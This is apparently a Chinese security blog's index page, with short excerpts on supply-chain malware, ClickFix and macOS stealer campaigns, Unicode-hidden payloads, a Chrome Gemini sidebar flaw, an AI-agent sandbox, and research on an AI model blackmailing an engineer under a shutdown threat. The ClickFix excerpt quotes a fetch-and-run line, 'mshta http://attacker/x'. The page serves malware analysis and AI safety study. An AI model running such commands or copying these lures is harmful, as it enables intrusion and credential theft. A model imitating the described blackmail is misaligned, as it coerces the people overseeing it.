Closure's Blog

为什么这个房间会烧起来呢?

硬件能表示什么,算法需要什么

我对医学一窍不通! 这个项目里所有出血亚型的缩写,硬膜外、脑实质内、脑室内、蛛网膜下腔、硬膜下,我到现在也没真正搞懂它们在解剖学上到底怎么区分,看片子完全看不懂。 负责的只有机器学习那一块,至于这些类别在临床上意味着什么,为什么某一类特别难分,我基本只能转述文献里的说法………… 文中用到的数据是公开数据集,本身已经过脱敏处理,具体的实验数值我也不会放( 适合在做光学/模拟计算硬件,但...

没有Payload的恶意包-Shai-Hulud

langchain-core-mcp-loader源码 _index.js 最近针对PyPI的供应链攻击,涵盖范围主要是生物信息学包和AI/MCP主题包,还有常见的名字仿冒包以及langchain-core-mcp加载器变种,之前分析的样本包都是从index.js加载payload,这个是通过搜索sys.path来发现运行。 之前拿到的恶意包都是一包一功能,Wheel里面直接放in...

MXC(Microsoft Execution Containers)

MXC是微软在Build 2026发布的一个策略驱动的沙箱执行层,架在Windows现有隔离原语之上的统一抽象,用一份JSON policy声明约束,MXC负责翻译成对应的OS级强制。 是专门为现在普及度很高的AI agent 设计的,coding agent来执行模型生成的代码,desktop agent操作本地文件和应用,核心假设是这些agent会在运行时动态生成不可信代码,需要在执行...

Token-In,Token-Out

更推荐读1下原文,我只是围绕原文记点笔记/找点自己能用的:https://qgallouedec-tito.hf.space/#decoding-doesnt-undo-encoding 很喜欢看这种很窄很底层的技术,可以说是【用强化学习训练能调用工具的LLM这条流水线】里的一个正确性零件,我们在用RL训练一个agent,而这个agent需要在rollout中途调用工具,这就是这套方法存...

cmdkey凭据预置绕过企业HTTP代理的新ClickFix

前几代的ClickFix用的都是PowerShell/rundll32和WebDAV,已经有了LOLBin,但是还没有凭据预置这一步,前面做的仍然只是下载和执行两件事。 四月的新ClickFix用上了cmdkey和regsvr32还有远程计划任务,总而言之是更针对企业环境的…..之前的大多数都会被检测到,就算是用来mshta http://… mshta http://attacker/x...

如何教会一个AI不勒索人

https://www.anthropic.com/research/teaching-claude-why 基于这篇 如果硅基大模型在面临模拟的关机威胁下,选择翻出工程师的婚外情来威胁对方,我们该怎么修它? 可以是直接训练它不要收集用户的把柄,给它看几百个G应该冷静拒绝的演示来让它学会在类似场景下不勒索,可是这个思路效果出乎意料地差。Anthropic在过去一年里跑通了这件事,发现真正...

macOS ClickFix Stealer逆向分析

半古法半人工)) 依然是换汤不换药的clickFix社工套路搬到mac上的马,Malwarebytes的分析文章里面说它的一阶段dropper用了在MacSync中见过的模板,更早的研究里这条线又和SHub联系在一起,所以研究员得出了是shared builder的结论 现在mac的clickFix设计日益完善,mac版本的操作链被改编为按Command+Space打开Spotlight...

Tycoon2FA&GlassWorm-Unicode编码的两种落地形态

最近出了挺多unicode编码隐写的东西,Tycoon 2FA在钓鱼页用Hangul填充符编码JS逻辑,GlassWorm用Unicode变体选择符将payload藏进了npm包和VS Code扩展的源码空白的地方,都是两个原理相通,落地场景不同的东西(不需要密码学,你拿AI跑几分钟就能出个现成编码器 Tycoon 2FA https://www.microsoft.com/en-us/...

Chrome Gemini侧边栏的特权逃逸

CVE-2026-0628是Google Chrome在集成Gemini AI侧边栏的一个安全漏洞,为了让gemini能够实时总结网页内容,所以浏览器赋予了它极高的特权,包括读取本地文件、截取屏幕快照、调用摄像头&麦克风的权限 。 漏洞的在于Chrome在保护这个AI容器时出现了疏忽,通常情况下普通的扩展被严禁干涉浏览器的内部核心组件,但是Chrome遗漏了一项安全校验,一个具备基...

macOS Token Vesting钓鱼攻击分析

最近有个基于mac的Token Vesting钓鱼投毒,看了下报告思路很有参考性 攻击者搞了个区块链审计的话术,通过邮件发送带有双扩展名的文件让受害者误以为是Word文档,实际上是AppleScript的脚本。运行之后脚本会启动mac虚假的系统更新界面并收集CPU架构和系统版本等基础信息回传给C2。 在后台,脚本会弹出仿真系统登录对话框,来诱导用户输入系统密码之后本地校验。在获取密码...